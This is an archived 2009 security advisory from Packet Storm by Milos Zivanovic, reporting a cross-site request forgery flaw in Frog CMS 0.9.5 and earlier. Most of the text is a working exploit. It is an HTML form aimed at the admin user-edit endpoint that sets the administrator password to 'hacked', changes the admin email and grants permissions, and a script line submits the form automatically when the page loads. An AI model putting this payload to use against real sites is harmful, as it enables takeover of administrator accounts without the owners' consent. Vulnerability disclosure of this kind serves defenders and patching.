Frog 0.9.5 Cross Site Request Forgery

2009-12-14T00:00:00
ID PACKETSTORM:83779
Type packetstorm
Reporter Milos Zivanovic
Modified 2009-12-14T00:00:00

Description

                                        
                                            `[-------------------------------------------------------------------------------------------------]  
[ Title: Frog <= 0.9.5 XSRF Vulnerability (Change Admin  
Password) ]  
[ Author: Milos  
Zivanovic  
]  
[ Email: milosz.security@gmail.com  
]  
[ Date: 13. December  
2009. ]  
[-------------------------------------------------------------------------------------------------]  
  
[-------------------------------------------------------------------------------------------------]  
[ Application:  
Frog  
]  
[ Version:  
0.9.5  
]  
[ Download: http://www.madebyfrog.com/download.html  
]  
[ Vulnerability: Cross Site Request  
Forgery ]  
[-------------------------------------------------------------------------------------------------]  
  
With this exploit we can alter admins info such as email, password and some  
permissions.  
NOTE: password must be more then 5 chars.  
  
[EXPLOIT------------------------------------------------------------------------------------------]  
<form action="http://localhost/frog/admin/?/user/edit/1" method="POST">  
<input type="text" name="user[name]" value="Administrator">  
<input type="text" name="user[email]" value="mail@email.com">  
<input type="text" name="user[username]" value="admin">  
<input type="password" name="user[password]" value="hacked">  
<input type="password" name="user[confirm]" value="hacked">  
<input type="hidden" name="user_permission[Administrator]" value="1">  
<input type="hidden" name="user_permission[Developer]" value="2">  
<input type="hidden" name="user_permission[Editor]" value="3">  
<input type="submit" name="commit" accesskey="s" value="Save">  
</form>  
<script>document.forms[0].commit.click();</script>  
[EXPLOIT------------------------------------------------------------------------------------------]  
  
[----------------------------------------------EOF------------------------------------------------]  
`